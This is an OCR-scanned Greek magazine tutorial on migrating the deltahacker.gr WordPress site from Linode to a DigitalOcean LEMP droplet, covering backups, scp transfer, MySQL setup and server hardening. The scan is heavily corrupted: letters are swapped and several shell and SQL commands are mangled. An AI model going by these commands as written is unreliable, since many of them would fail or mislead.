* εγκατάσταση κι ενεργοποίηση κάποιου maintenance plugin, όπως είναι το 
Maintenance Mode (https://wordpress.org/plugins/lj-maintenance-mode) 


* Àñunbackup βάσης και site, T.X., ug Tn βοήθεια κάποιου plugin σαν το BackWPup 
(https://wordpress.org/plugins/backwpup) 


µεταφορά backup βάσης και site στο νέο VPS 


Νέος host (Digital Ocean) 

ρυθμίσεις ασφαλείας για Tn MySQL 

* δηµιουργία βάσης για To WordPress 

* εισαγωγή στη νέα βάση των πινάκων της βάσης από To backup 
µεταφορά αρχείων (του site), artó το backup στον κατάλληλο κατάλογο 
ρυθμίσεις ιδιοκτησίας για τα αρχεία rou site 

* τροποποίηση rou wp-config.php, αν χρειάζεται 

* τροποποίηση του αρχείου του site, που χρησιμοποιεί ο nginx 


* επανεκκίνηση nginx και php5-fpm, έλεγχος απὀ VM/box µε πειραγµένο το 
hosts file (στο νέο site -ὀχι στο παλιό-- θα χρειαστεί va απενεργοποιήσουµε 
το Maintenance Mode plugin) 


* τροποποίηση DNS στον registrar, (ὥστε για To site να ισχύουν ot nameservers 
του νέου host 


* έλεγχος DNS propagation, π.χ., ató το http://cachecheck.opendns.com 
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* αρχικάοιεπισκέπτες θαβλέπουν τοπαλιό site kat ro Maintenance Mode plugin, 
κάποια στιγµή όµως θα αρχίσουν να βλέπουν το καινούργιο 


* σε κάποιες περιπτώσεις απαιτείται εκκαθάριση της DNS cache των local 
resolvers — kat o ευκολότερος τρόπος είναι µε ένα reboot 


* µετά 48 ώρες εἶναι ασφαλές νακατεβάσουµε το παλιό site, αφού όλοι οι clients 
θαβλέπουν TO véo 


* bonus: αναβάθµιση της ασφάλειας στο νέο site, WOTE οι εργασίες που αφο- 
ρούν στη διαχείριση plugins και themes ναι pev να γίνονται αυτόματα αλλά 
µέσω SSH και µε key-based authentication 


Όλα αυτά τα βήματα φαίνονται πολλά - και είναι. Στην πραγματικότητα, όµως, αν η 
επιχείρηση της μεταφοράς γίνει οργανωμένα και μεθοδικά, τότε θα έχει ολοκλη- 
ρωθεί µέσα σε ένα απόγευμα. Δεν εἶναι και πολύς χρόνος, αν το καλοσκεφτείτε. 
Παρακολουθήστε το σκεπτικό της εργασίας µας και τις ενέργειες που κάναμε. 


Δημιουργία νέου host και DNS 


Χρειαζόμαστε ένα VPS ή αλλιώς droplet στο cloud της Digital Ocean. Αυτό θα εἰναι ο 
νέος µας host. H μέχρι τώρα εμπειρία µε το deltahacker.gr έχει δείξει ότι το droplet 
αρκεί va διαθέτει 208 RAM και δύο (εικονικούς) επεξεργαστές. 


Σημείωση. Αν σκοπεύετε να φτιάξετε κι εσείς το VPS σας στη Digital 
Ocean, έχετε υπόψη ότι µπορείτε να κερδίσετε 109 σε credit ακολουθώ- 
ντας αυτό το referral URL: 


http://bit.ly/digocean10off 


Αν το κάνετε, βοηθάτε κι εμάς να µειώσουμε τα μηνιαία ἐξοδα hosting. 
Ευχαριστούμε! 


Το λειτουργικό σύστημα του VPS θέλουμε να εἶναι το Ubuntu Server 14.04 LTS 64bit 
και το software stack που χρησιμοποιούμε για το site εἰναι το LEMP (Linux, nginx, 
MySQL, PHP). Μπορούμε να ξεκινήσουμε από éva VPS ue καθαρή’ εγκατάσταση του 
Ubuntu Server και κατόπιν va εγκαταστήσουµε όλο το απαραίτητο λογισμικό. Σίγου- 
ρα δεν είναι η ruo βαρετή εργασία που μπορούμε να φανταστούμε. Την έχουµε όµως 
κάνει αρκετές φορές στο παρελθόν και τώρα βιαζόμαστε να μεταφέρουμε το site 
στο νέο του host, ápa av θα μπορούσαμε να αποφύγουμε όλες αυτές τις εγκαταστά- 
σεις kat rtc ρυθμίσεις θα ήταν καλά. Όπως εἶναι εύκολο να φανταστείτε, φυσικά και 
μπορούμε: Απλά, αντί για éva "σκέτο" image µε το Ubuntu Server, για το νέο µας VPS 
πηγαίνουμε στην κατηγορία Applications κι επιλέγουμε το LEMP on 14.04. Δείτε τα 
screenshots που ακολουθούν και διαβάστε τις αντίστοιχες περιγραφές για περισσό- 
τερες πληροφορίες. 
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eoe < [iu] ΔΕ 8 Digital Ocean, Inc. cloud.digitalocean.com/droplets/new [v mio = 
C ο 
cC roplets Images DNS API Support ο» 


Create Droplet 


Droplet Hostname 


| Your Droplet 


deltahacker.gr| 
Hostname 
deltahacker.gr 
Size 
Select Size $20/mo 
Region 
New York 3 
*5/mo $1O/mo $20mo 540/πο $80/no SN 
$0.007hour $0.015/hour $0.030/nour $OO60our $0:t19hour 14.04 x64 
Settings 
512 MB 1GB 2GB 4GB PL 8GB I 
20 GB SSD D 30 GB SSD D 40GB 60 G8 80 GB 
1000 GB 278 378 4TB 57B SSH Keys 
$160 mo $320 mo $480 mo $640 mo 
$0.238/hour $0476/hour $0714hour $0.952/our 
16 GB 32GB 48 GB 64 GB 
160GB 320GB SSD D 480 GB 640GB 


Πα τις ανάγκες rou deltaHacker, το τρίτο κατά σειρά μεγέθους droplet είναι ότι 
πρέπει: Διαθέτει 2GB RAM, δύο εικονικούς επεξεργαστές, 40GB εικονικό δίσκο 
(πάνω σε SSD), καθώς και 3ΤΒ bandwidth δωρεάν, ανά μήνα. Παρατηρήστε, εξάλ- 
Aou, τη θυρίδα ονόματι Droplet Hostname: Σε αυτή προτείνεται να πληκτρολο- 
γήσουµε το domain name του site που θα φιλοξενείται στο VPS, εν προκειμένω 
deltahacker.gr. Αυτό θα έχει ως συνέπεια τη δηµιουργία σχετικού PTR record για 
το domain. 


eoe < m, 33 8 Digital Ocean, Inc. cloud.digitalocean.comvdroplets/new — C &. ΕΕ 
(wa D 
< roplets Images DNS API Support ἂν 


Select Region 


Your Droplet 
π m= rum Μπι Hostname 
— ος] deltahackergr 
New York San Francisco Singapore London kė 
$20/mo 
3 3 1 1 1 
Region 
2 2 Amsterdam 2 
Image 
i: 14.04 x64 
Settings. 
SSH Keys 
Frankfurt τ 


1 


Στο επόμενο βήμα επιλέγουμε τη γεωγραφική περιοχή rou datacenter στο οποίο 
θα δημιουργηθεί και θα υφίσταται το VPS. H συντριπτική πλειονότητα των επι- 
σκεπτώὠν TOU Site εἶναι στην Ελλάδα, οπότε μάλλον θα έπρεπε va επιλέξουμε το 
datacenter στη Φρανκφούρτη. Κάτι µας έπιασε όµως -ur µας ρωτήσετε τι- και 
στραφήκαμε oro datacenter στο Άμστερνταμ. 
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ze Â Digital Ocean, Inc. cloud.digitalocean.com/droplets/new e | ES 
g c Droplets Images DNS API Support ov 
Select Image " d 
Your Droplet 


Applications 


lj FreeBSD AMP on 101 


dj Django on 1404 


Qj) Mumble Server (murmur) 
0n 1404 


Hostname 
deltahacker.gr 


Size 
$20/mo 


Region 
^ Amsterdam 2 
È LAMP on 404 o LEMP on 14.04 (by MEAN on 1404 
Image 
LEMP on 1404 
J Joomla! 3.41 on 14.04 ©) Drone on 1404 (j) Magento 1.911 on 14.04 — 
Zi Ghost 0.6.4 on 14.04 Ruby on Refs on 404 e, ownCloud 8.04 on 14.04 


š Docker17 on 14.04 
4) | MongoDB 30.4 on 14.04 


ELK Logging Stack on 
S7 04 


© (Postgres, Nginx, U... 


Θ Drupal 738 on 14.04 
(S) node-v012.5 on 14.04 


(fy. WordPress on 14.04 


Ὁ Dokku v0.319 on 1404 
«5» Cassandra on 14.04 


W GitLab 712.2 CE on 14.04 


SSH Keys 


* ΜΕΡΗ 1.24.2 on £ Redmine on 14.04 


Á. PHPMyAdmin on 14.04 


Μεταξύ των έτοιμων images που έχουµε va επιλέξουμε για ro VPS µας, είναι 
εκείνα στις κατηγορίες Distributions και Applications (βλ. ομώνυμες καρτέλες). 
Από την κατηγορία Distributions επιλέγουμε image που αντιστοιχεί σε καθα- 
ρή εγκατάσταση κάποιου λειτουργικού συστήµατος όπως, T.X., CentOS, Ubuntu 
Server, FreeBSD κ.ά. Από την κατηγορία Applications διατίθενται images τα οποία, 
εκτός από το λειτουργικό σύστημα, έχουν εγκατεστημένα software stacks — ev- 
δεχοµένως κι εφαρμογές ή υπηρεσίες. Υπάρχει, T.X., το ownCloud 8.04 on 14.04, 
το οποίο είναι ένα image µε Ubuntu Server 14.04 κι εγκατεστημένα τα ΙΑΜΡ stack 
και ownCloud 8.04. Για τις δικές µας ανάγκες, ro LEMP on 14.04 είναι ότι ακριβώς 
θέλουμε: Έχει το Ubuntu Server 14.04 LTS 64bit και LEMP stack - τίποτε άλλο. 


eee < m * @ Digital Ocean, Inc. cloud.digitalocean.com/droplets/new (7, Lo ΙΙ 
(5 Droplets Images DNS API Support αν 
Available Settings 
Your Droplet 
Private Networking Backups IP6 User Data Hostname 
deltahackergr 
Size 
Add SSH Keys (optiona) $20/mo 


Region 


Image 
LEMP on 14.04 


No root password will be emailed to you because you have selected 4 SSH Keys for access. 


Settings 


SSH Keys 

Core i3 PC [Wind... 
BlackBook 
MBPrIS 

SGN4 


Λίγο πριν δημιουργήσουμε το véo VPS υποδεικνύουµε τέσσερα δημόσια κλειδιά, 
τα οποία θα πάνε στο αρχείο ~/.ssh/authorized_keys του χρήστη root. Έτσι, απὀ 
τέσσερις συσκευές µας (éva ΡΟ, δύο laptops κι ένα smartphone) θα μπορούμε να 
συνδεόµαστε στο VPS µε ασφάλεια µέσω SSH και «χωρίς: να πληκτρολογούμε 
κάποιο password. Περισσότερα για τα SSH passwordless logins μπορείτε va òta- 
βάσετε oro http://deltahacker.gr/actsubs-openssh-secure-passwordless-logins. 
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eoe < m 


ce Droplets Images 


PTR Records 


* 


DNS 


8 Digital Ocean, Inc. eloud.digitalocean.com/domains [v 


API 


Support 


To update your PTR record please update your Droplet's hostname through the control panel. 


IP Address 


104131181.237 


162.243.8713 


46101173140 


188.226190.206 


PTR Record 


defiant.gr. 


parabing.com. 


box.colder.xyz. 


deltahacker.gr. 


L UH 


Create Droplet ον 


Ta PTR records για ra droplets µας στη Digital Ocean. Δεν εἶναι υποχρεωτικό 
να υπάρχουν, αν όµως στέλνουµε mail από το εκάστοτε domain τότε οι άλλοι 
mailservers έχουν ένα λόγο λιγότερο yta va µας χαρακτηρίσουν ως spammers. 


eoe < m 


u. Droplets Images 


Droplets 


mg Name 


° @ defiant.gr 

° @ parabing.com 
9 [ο] box.colder.xyz 
9 @ deltahacker.gr 


* 


DNS 


8 Digital Ocean, Inc. cloud.digitalocean.com/droplets [v] 
API Support 
IP Address Memory 
104131181.237 512 ΜΒ 
162.243.8713 2 GB 
46401173140 1GB 
188.226.190.206 2 GB 


5 LO IB 


Create Droplet ον 


Disk 


20 GB 


40 GB 


30 GB 


40 GB 


Region 


NYC3 


NYC2 


FRA1 


AMS2 


Ιδού ra droplets µας, oro cloud της Digital Ocean. Δεν πιστεύουµενα µη γνωρίζετε 
την ιστορία αυτού του box.colder.xyz, g; Αν πράγματι δεν τη γνωρίζετε, ξεκινήστε 
από το άρθρο oro http://deltahacker.gr/actsubs-your-own-mailserver-p1. 


53 


YVHAQKER 


eoe < πι * E & Digital Ocean, Inc. cloud.digitalocean.com/domains/dc [v] Â m [r 
c Droplets Images DNS API Support τν 
188.226.190.206 Save Remove 
aspmx.l.google.com. Save Remove 
altl.aspmx.l.google.com. Sav Remove 
alt2.aspmx..google.com. f . ο ν Remove 
alt3.aspmx.l.google.com. Save Remove 
alt4.aspmx.l.google.com. Save Remove 
"v=spf1 include: spf.goog Save Remove 
ns1.digitalocean.com. Save Remove 
ns2.digitalocean.com. Save Remove 
ns3.digitalocean.com. Save Remove 


Ot ρυθµίσεις DNS για το deltahacker.gr, όπως απεικονίζονται απὀ τη σχετι- 
κή σελίδα της Digital Ocean. Το email για το deltahacker.gr είναι hosted από 
τη Google και για τον καθορισμό των σχετικών records (MX και TXT) αρκεί 
ἑνα κλικ σε σχετικό κουμπάκι, oro web control panel της Digital Ocean. Σηµει- 
ώστε ότι TO hosting του email από πλευράς Google έχει πάψει να εἶναι δωρε- 
áv για τους νέους χρήστες της σχετικής υπηρεσίας (Google Apps for Work, 
https://www.google.com/work/apps/business). Αλλά αυτό δεν πρέπει να σας 
προβληματίζει, αφού χάρη στη σειρά άρθρων που ξεκινά από το τεύχος 043 uno- 
ρείτε va στήσετε πανεύκολα τον δικό σας mailserver για το domain σας. Mpo- 
σοχή: Σκόπιµα δεν έχουµε ακόµα ενημερώσει rov registrar, από τον οποίο έχου- 
ug πάρει ro deltahacker.gr, για τους νέους nameservers (nsl.digitalocean.com, 
ns2.digitalocean.com και ns3.digitalocean.com). Για όλους τους επισκέπτες του 
deltahacker.gr ισχύουν οι παλιοί nameservers τῆς Linode, ἐτσι όλοι τους καταλή- 
γουν στο παλιό’ VPS και φυσικά βλέπουν το site κανονικά. (Αυτό που θα βλέπουν 
σε λίγο είναι η σελίδα του Maintenance Mode plugin, η οποία θα πληροφορεί για 
τη μετακόμιση σε νέο host.) 


Βασικές ρυθμίσεις νέου host και ασφάλεια 


Το νέο µας VPS έχει ήδη εγκατεστημένο LEMP stack, μένουν ωστόσο πολ- 
λές εργασίες σχετικές µε το σύστημα και την ασφάλεια τις οποίες opsi- 
λουµε και θέλουμε να κάνουμε τώρα. Ακολουθούμε τις οδηγίες από το 


http://deltahacker.gr/actsubs-1srv2clouds-p23, ὥστε: 
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* να δώσουμε ένα password στον χρήστη root, για τις περιπτώσεις που χρειάζε- 
ται να κάνουμε login από τη web console της Digital Ocean 


* να φρεσκάρουµε τη λίστα του Ubuntu µε τα διαθέσιµα πακέτα και v' αναβαθ- 
μίσουμε ήδη εγκατεστημένα για ra οποία υπάρχουν ενημερωμένες εκδόσεις 


* ναορίσουµε τη ζώνη ρας kat va φροντίσουμε για την παρουσία NTP client 


* va φτιάξουμε swap file, να το ενεργοποιήσουµε και να ενημερώσουμε σχετικά 
το /etc/fstab 


* va τροποποιήσουµε το /etc/ssh/sshd. config (ὥστε o OpenSSH server va δέχε- 
ται συνδέσεις anó τη µη-στάνταρ θύρα (22/ TCP), va απαγορεύει ra root logins 
και να επιτρέπει µόνο passwordless authentication για τους απλούς χρήστες 
(µε χρήση κατάλληλων κλειδιών) 


* va δημιουργήσουμε έναν λογαριασμό απλού χρήστη ο οποίος θα µπορεί va 
εκτελεί εργασίες µε δικαιώµατα root, καθώς και να φροντίσουμε ώστε να 
συνδέεται απομακρυσμένα στο σύστημα χωρίς την πληκτρολόγηση password 
αλλά µε χρήση των κατάλληλων κλειδιών 


* να εγκαταστήσουµε, ρυθµίσουµε κι ενεργοποιήσουµε το fail2ban, wore να 
αποτρέπουµε βασικές επιθέσεις DoS και bruteforce attacks 


* να ρυθµίσουµε ro firewall (iptables) και να βεβαιωθούμε ότι οι κανόνες µας θα 
ενεργοποιούνται αυτόματα κατά την εκκίνηση του συστήµατος 


* να κάνουμε ότι χρειάζεται WOTE τυχούσες ενημερώσεις ασφαλείας να εγκα- 
θίστανται αυτόματα 


Επαναλαμβάνουμε ότι όλες αυτές οι εργασίες περιγράφονται αναλυτικά στο 
http://deltahacker.gr/actsubs-1srv2clouds-p23. Μια τελευταία εργασία που δεν πε- 
ριγράφεται στο εν λόγω άρθρο αλλά εἶναι απαραίτητη για την ορθή λειτουργία του 
WordPress site µας, αφορά στην εγκατάσταση των πακέτων php5-gd και libssh2-php: 


admin@deltahacker:-$ sudo apt-get install php5-gd libssh2-php 


(admin είναι ro username του απλού λογαριασμού χρήστη που έχουµε δημιουργήσει 
στο droplet µας). Πα περισσότερες πληροφορίες περίτων συγκεκριμένων πακέτων, 
δώστε κάτι σαν 


admin@deltahacker:-$ apt-cache show libssh2-php 


Σ' αυτό το σηµείο ο νέος µας host είναι πανέτοιµος να δεχτεί TO WordPress site του 
deltahacker.gr. Σημειώστε ότι, µιας και “σκόπιμα” δεν έχουµε ακόµα ενηµερώσειτον 
registrar για τους νέους nameservers του deltahacker.gr, προς το παρόν vat HEV TO- 
ρούμε να συνδεόµαστε στον νέο host µέσω SSH, αλλά «μόνον µε χρήση της δημόσι- 
ας διεύθυνσης IP rou. Ac στρέψουµε τώρα την προσοχή µας στον παλιό host. 
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Απενεργοποίηση rou παλιού site και πλήρες backup 


Στον παλιό host φτάνουμε είτε µε χρήση της δημόσιας IP του siTe µε βάση το 
domain name του site. Από τον αγαπημένο µας web browser συνδεόμαστε στο λο- 
γαριασμό του διαχειριστή κι εγκαθιστούµε ένα plugin σαν το Maintenance Mode 
(https://wordpress.org/plugins/lj-maintenance-mode). To ρυθμίζουμε και το ενεργο- 
ποιούμε, WOTE OL επισκέπτες TOU site va βλέπουν µια σελίδα που πληροφορεί vta rr] 
διαδικασία της µετακόµισης - και βεβαίως να µην έχουν κάποια άλλη δυνατότητα 
αλληλεπίδρασης µε ro site. 


ze 


Plugin Settings: Maintenance Mode 5.4 


Activate/Deactivate Maintenance Mode 


Θέλουμετο Maintenance Mode plugin ναλειτουργεί χωρίς χρονικό ópto (BA. Backtime) 
καιοι επισκέπτες TOU Site va αντικρίζουν το μήνυμαπου έχουµε πληκτρολογήσειστο 
πλαίσιο Message. 


deltaHacker » We're moving to a new host... Mozilla Firefox: 


~ e|[& search wa *+ + e 


deltaHacker 


Μετακομίζουμε 


νι 


Νατι βλέπει ο επισκέπτης του site, όταν έχουµε το Maintenance Mode plugin ενεργοποι- 
ημένο. Δεν θα ro απενεργοποιήσουµε ποτέ: όταν ολοκληρώσουμε τη µεταφορά του site 
στον νέο host θα αλλάξουμετις ρυθμίσεις DNS στον registrar και, μετά από κάποιο χρόνο 
που απαιτείται για τη διάδοση των αλλαγών DNS, οι επισκέπτες του deltahacker.gr θα 
εξυπηρετούνται από τον web server του νέου host. 
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Στη συνέχεια οφείλουμε va πάρουμε ένα πλήρες backup της βάσης και των αρχείων του 
site. Οι δύο αυτές εργασίες είναι δυνατόν να γίνουν "χειροκίνητα", δηλαδή από τη γραμμή 
εντολών. Πα va εκµηδενίσουµε όµως την πιθανότητα κάποιου λάθους, αξίζει να καταφύ- 
γουµε σε ένα σχετικό plugin. Αυτό που εμείς χρησιμοποιούμε είναι η δωρεάν εκδοχή του 
BackWPup (Rttps://wordpress.org/plugins/backwpup). Το BackWPup έχει τη δυνατότη- 
τα να δημιουργεί -αυτοματοποιηµένα ή χειροκίνητα-- backups, τα οποία στέλνει σε διά- 
φορες δικτυακές υπηρεσίες, όπως, π.χ., το Dropbox ή ra Amazon S3 compatible storage 
systems. Μπορεί, επίσης, να τα αποθηκεύει τοπικά, δηλαδή σε συγκεκριµένο κατάλογο 
του host. Σε κάθε περίπτωση εμείς παίρνουμε ένα -προαιρετικά cuurueouévo- archive 
που περιλαμβάνει óda Ta αρχεία kat τους υποκαταλόγους rou site, καθώς κι ἐναμικρότε- 
po (συμπιεσμένο) archive που αποτελεί éva πλήρες dump της βάσης rou site. 


Add new job « deltaHacker — WordPress = Mozilla Firefox 


e DBBackup Flies DE Check | To: Drophox 


XMLexport Plugins 


Job Name 


Please name this Job. Backup2Dropbox 


Job Tasks 


This job is a 


Backup File Creation 


Ασχέτως TOU µέσου στο οποίο θα πάει ro backup, φροντίζουμε woTe να περιλαμβάνει 
τα πάντα. Εντάξει, ίσως δεν µας ενδιαφέρει αυτό το WordPress XML export, ούτε η λίστα 
µε τα εγκατεστημένα plugins. Θέλουμε όµως οπωσδήποτε τσεκαρισµένα ra Database 
backup και File backup. 


Add new job  daltaHacker — WordPress = Mozilla Firefox 


B New Galery WargGuard f BackWPup 550 View ste as: Membership A 
BackWPup Job: Backup2Dropbox 
General schedule DBBackup Files xMLexport Plugins DB Check το: Dropbox 


Settings for database backup 


e e E 


&KAKRAR4USASAKK&ARAAXAZAK 


ο KR 


w * 


Ειδικά για το backup της βάσης, φροντίζουμε ώστε να περιλαμβάνονται όλοι οι 
πίνακες ανεξαιρέτως. 
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id in as a Membership Admin user, you wil therefore see all protected content on this site 


BackWPup Jobs ine 


E 


BackWPup Jobs aane 


YV HAQKER 


Παρακολουθούμε éva 
backup στο Dropbox εν 


πα εξελίξει. Υπόψη ότι σε 


κάποιες περιπτώσεις 
τα backups προς το 
Dropbox αποτυγχάνουν, 
επιστρέφοντας éva 
μάλλον άχρηστο μήνυ- 
μα λάθους περί internal 
server error. 


Αν δεν έχετε καλή 
τύχη µε τα backups του 
BackWPup στο Dropbox, 
φτιάξτε ένα job WOTE TO 
plugin να αποθηκεύει τα 
αντίγραφα εφεδρείας 
σε ἑναν τοπικό κατάλο- 
γο. 


Πα κάθε backup που 
ολοκληρώνεται επιτυ- 
xo; από ro BackWPup, 
στο σχετικό παράθυρο 
με το log της διαδικα- 
σίας δεν υπάρχει ούτε 
καν ένα warning. Το ίδιο 
θα παρατηρήσουμε αν 
έχουμε ζητήσει από το 
plugin να µας στέλνει 
email, μετά από κάθε 
backup job. 


Μετακόµιση site σε νέο host ἃ ενίσχυση της ασφάλειας 


Μεταφορά του backup στον νέο host 


Στο σηµείο αυτό υποθέτουμε ότι έχουµε ήδη πάρει πλήρες backup του site και 
της βάσης, T.X., µε χρήση rou BackWPup plugin για το WordPress. To backup si- 
ναι éva µόνο συμπιεσμένο tar archive — στο παράδειγμά µας ro backwpup. 714 
069. 2015-07-15. 14-43-06.tar.gz. 


parabingG)deltahacker: "/backup 
File Edit View Search Terminal Tabs Help 
T parabing(gdeltahacker: ^/backup 


parabing&deltahacker:-/backup$ 15 -1h 

total 6.20 
www-data www-data 616M Jun ° backwpup_7140e9_2015-06-09_04-00-09. 
www-data www-data 616M Jun : backwpup. 714069 2015-06-12 04-00-02. 
www-data www-data 616M Jun : backwpup. 714069 2015-06-16 04-00-05. 
www-data www-data 617M Jun : backwpup. 714069 2015-06-19 04-00-02. 
www-data www-data 621M Jun : backwpup. 714069 2015-06-23 04-00-05. 


ww-data www-data 621M Jun : backwpup. 714069 2015-06-26 04-00-02. 
www-data www-data 636M Jun : backwpup 714069 2015-06-30 04-00-02. 
www-data www-data 639M Jul ; backwpup. 714069 2015-07-03 04-00-08. 
www-data www-data 637M Jul :46 backwpup 714069 2015-07-05 14-44-49. 
www- data 637M Jul : backwpup. 714069 2015-07-15 14-43-06. 
www-data www-data 99 Apr : index.php 


To apxsto-backup μάς το έδωσε ro BackWPup plugin για ro WordPress. Είναι το 
συμπιεσμένο archive µε όνομα backwpup. 7 140e9. 2015-07-15. 14-43-06.tar.gz και 
περιλαμβάνει τα αρχεία και τους καταλόγους rou site, καθώς και πλήρες dump 


της βάσης του. 


Με κάποιον τρόπο πρέπει να μεταφέρουμε το εν λόγω archive στον νέο host. Υπάρ- 
χουν πολλοί τρόποι για va το πετύχουμε. Ας δούμε, π.χ. πώς το μεταφέρουμε µε 
χρήση του εργαλείου scp: 


Σημειώνουμε ότι: 


* TO port 49250 είναι εκείνο απὀ το οποίο αφουγκράζεται για αιτήσεις πελατών 
o OpenSSH server rou νέου host 


* αυτό TO "admin" εἶναι To username του απλού χρήστη που έχουµε ήδη φτιάξει 
στον νέο host 


* η δημόσια αριθμητική διεύθυνση IP του νέου host είναι 188.226.190.206 


* o tmp εἶναι ένας «κενός: προσωρινός κατάλογος που έχουµε δημιουργήσει 
στο home directory του χρήστη admin 
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Av θυµόσαστε, o OpenSSH server στον νέο host εἶναι ρυθµισµένος core va *un* δέ- 
χεται συνδέσεις SSH µε πληκτρολόγηση password. [iq va δουλέψει λοιπόν η mapa- 
πάνω εντολή, το δημόσιο κλειδί του χρήστη στον παλιό host -κι αναφερόμαστε o' 
εκείνον το χρήστη που τώρα χρησιμοποιεί το scp- πρέπει να βρίσκεται στο αρχείο 
—-/[.ssh/authorized. keys του χρήστη admin, στον νέο host. Αν αυτό δεν ισχύει στην 
περίπτωσή σας και τώρα δεν έχετε διάθεση για προσθήκες στο authorized-keys — 
ούτως ή άλλως οπαλιός host δεν πρόκειται να μείνει για πολύ ακόµα όρθιος--, τότε 
ug τη βοήθεια ενός ΕΡΤ client που υποστηρίζει συνδέσεις SFTP απλά κατεβάστε το 
αρχείο backwpup. 714069 2015-07-15. 14-43-06.tar.gz στον τοπικό σας υπολογιστή 
και μετά, ξανά µε τον ίδιο FTP client, ανεβάστε το στον véo host. Αναμενόμενα, au- 
τός ο τρόπος μεταφοράς χρειάζεται περισσότερο χρόνο για να ολοκληρωθεί. Ίσως 
όμως va un βιάζεστε πολύ σήμερα. 


parabing@deltahacker: "/backup 
File Edit View Search Terminal Tabs 
parabing@deltahacker: "/backup 
parabing@del tahacker :~/backup$ 
1 6.26 


www-data www-data 616M Jun 8 :02 backwpup 7140e9 2015-06-09 04-00-09.tar.gz 

www-data www-data 616M Jun 11 :01 backwpup. 714069 2015-06-12 04-00-02.tar.gz 

www-data www-data 616M Jun 15 21:01 backwpup 7140e9 2015-06-16 04-00-05.tar.gz 

www-data www-data 617M Jun 18 :01 backwpup 7140e9 2015-06-19 04-00-02.tar.gz 

www-data www-data 621M Jun 22 :01 backwpup 7140e9 2015-06-23 04-00-05.tar.gz 

www-data www-data 621M Jun 25 01 backwpup 7140e9 2015-06-26 04-00-02.tar.gz 

www-data www-data 636M Jun 29 21:01 backwpup 7140e9 2015-06-30 04-00-02.tar.gz 

www-data www-data 639M Jul 2 01 backwpup 7140e9 2015-07-03 04-00-08.tar.gz 

www-data www-data 637M Jul 5 :46 backwpup 7140e9 2015-07-05 14-44-49.tar.gz 

www-data www-data 637M Jul 15 :44 backwpup 7140e9 2015-07-15 14-43-06.tar.gz 

www-data www-data 99 Apr 18 :53 index.php 
parabing8deltahacker:-/backup$ 
parabingGdeltahacker:-/backup$ scp -P 49250 backwpup 714069 2015-07-15 14-43-06.tar.gz admin8188.226.190.206:-/tmp 
backwpup 7140e9 2015-07-15 14-43-06.tar.gz 100% 637MB 23.6ΜΒ/5 00:27 
parabing@del tahacker :~/backup$ β C 


H µεταφοράτου αρχείου γίνεται απευθείας μεταξύ Twv datacenters των Linode και 
Digital Ocean. Όπως βλέπετε κι εσείς, η ταχύτητα μεταφοράς δεν απογοητεύει. 


Δημιουργία βάσης για το site, στον νέο host 


H MySQL εἶναι εγκατεστημένη και για µία φορά µόνο θα τρέξουµε ένα απλό script 
για την προετοιμασία του MySQL server, µε γνώμονα την ασφάλεια: 


admin@deltahacker:-$ 


Αρχικά, TO script µάς ζητά να αλλάξουμε password για τον χρήστη root της MySQL 
(απλή συνωνυμία µε rov root του λειτουργικού). Υπόψη ότι το προκαθορισμένο 
password rou root αναφέρεται στο μήνυμα που βλέπουμε στο τερματικό, αµέσως 
μετά τη σύνδεσή µας στο VPS. Ακολούθως το script μάς ζητά άδεια για a) τη δια- 
γραφή ορισμένων ανώνυμων χρηστών της MySQL, B) την απαγόρευση των αποµα- 
κρυσμένων συνδέσεων για τον root (πάντα της MySQL), y) τη διαγραφή της βάσης 
ονόματι test και ó) την επαναφόρτωση των πινάκων δικαιοδοσιών (privilege tables). 
Σε κάθε περίπτωση δίνουμε ro ΟΚ απαντώντας καταφατικά. 
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Ας δημιουργήσουμε τώρα μία νέα βάση δεδοµένων, στην οποία θα εισαγάγουµε 
τους πίνακες από ro backup που πήραμε από τον παλιό host. Καταφεύγουμε στο 
εργαλείο mysql kat ονομάζουμε τη νέα βάση deltahacker_db: 


$ mysql -u root -ρ 
mysql» CREATE DATABASE deltahacker_db; 
Query OK, 1 row affected (0.00 sec) 


mysql> CREATE USER deltahacker_user@localhost IDENTIFIED BY 'aint_no_real_ 
password'; 


Query OK, 0 rows affected (0.00 sec) 

mysql» GRANT ALL PRIVILEGES ON deltahacker db.* TO deltahacker userGlocalhost; 
Query OK, 0 rows affected (0.00 sec) 

mysql» FLUSH PRIVILEGES; 

Query OK, 0 rows affected (0.00 sec) 

mysql> exit 

Bye 

$ 


Πριν κάνουμε οτιδήποτε, χρειάστηκε va πληκτρολογήσουμε ro password rou χρή- 
στη root (της MySQL). Εκτός από τη βάση ονόματι deltahacker. db, φτιάξαμε έναν 
νέο χρήστη της MySQL µε username το deltahacker_user και password το aint.. 
no_real_password. Στο συγκεκριµένο χρήστη δώσαμε πλήρη δικαιοδοσία επί της 
deltahacker db. Εσείς, βεβαίως, θα ονοµάσετε τη βάση και το χρήστη όπως προτι- 
μάτε, ενώ ελπίζουμε να του δώσετε κι éva καλύτερο password. 


Εισαγωγή στη νέα βάση των πινάκων της παλιάς 


Ξεκινάμε αποσυμπιέζοντας ro archive rou backup, δηλαδή το αρχείο που έχουµε 
πάρει από το BackWPup plugin: 


$ cd -/tmp 
-/tmp$ tar zxf backwpup 714069 2015-07-15 14-43-06.tar.gz 


To backup της βάσης rou site εἶναι το αρχείο deltahacker. db.sql.gz. To αποσυμπιέ- 
ζουμε πληκτρολογώντας 


~/tmp$ gunzip deltahacker db.sql.gz 


και TO περιεχόμενό του ro εισάγουµε (import) στη βάση deltahacker db, την οποία 
δημιουργήσαμε πριν λίγο: 
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-/tmp$ mysql -h localhost -u deltahacker user -p deltahacker_db < deltahacker_ 
db.sql 


Enter password: 
-/[tmp$ 


Ωραία. Το αρχείο deltahacker. db.sgl δεν το χρειαζόμαστε pact µε όλα τα άλλα που 
πήραμε από την αποσυμπίεση rou archive, οπότε ro artouakpüvoupe από τον κατά- 
λογο tmp ή ακόµη ro διαγράφουµε κιόλας: 


-/tmp$ rm deltahacker_db.sql 


Κατάλληλη τοποθέτηση των αρχείων του site 


Το αρχείο backwpup.7140e9. 2015-07-15.14-43-O6.targz, όπως επίσης και τα 
deltaHacker.pluginlist.2015-07-15.txt.gz και deltaHacker.wordpress.2015-07-15.xml.gz, 
δεν τα χρειαζόμαστε στον κατάλογο ~/tmp. (Ειδικά ra δύο τελευταία, αναλόγως 
των επιλογών που έχετε κάνει στο BackWPup ίσως να µην τα έχετε στον δικό σας 
κατάλογο.) Μπορούμε λοιπόν είτε να τα µετακινήσουµε είτε να τα διαγράψουμε. 
Όλα τα υπόλοιπα αρχεία και τους καταλόγους του —/tmp τα μεταφέρουμε στο προ- 
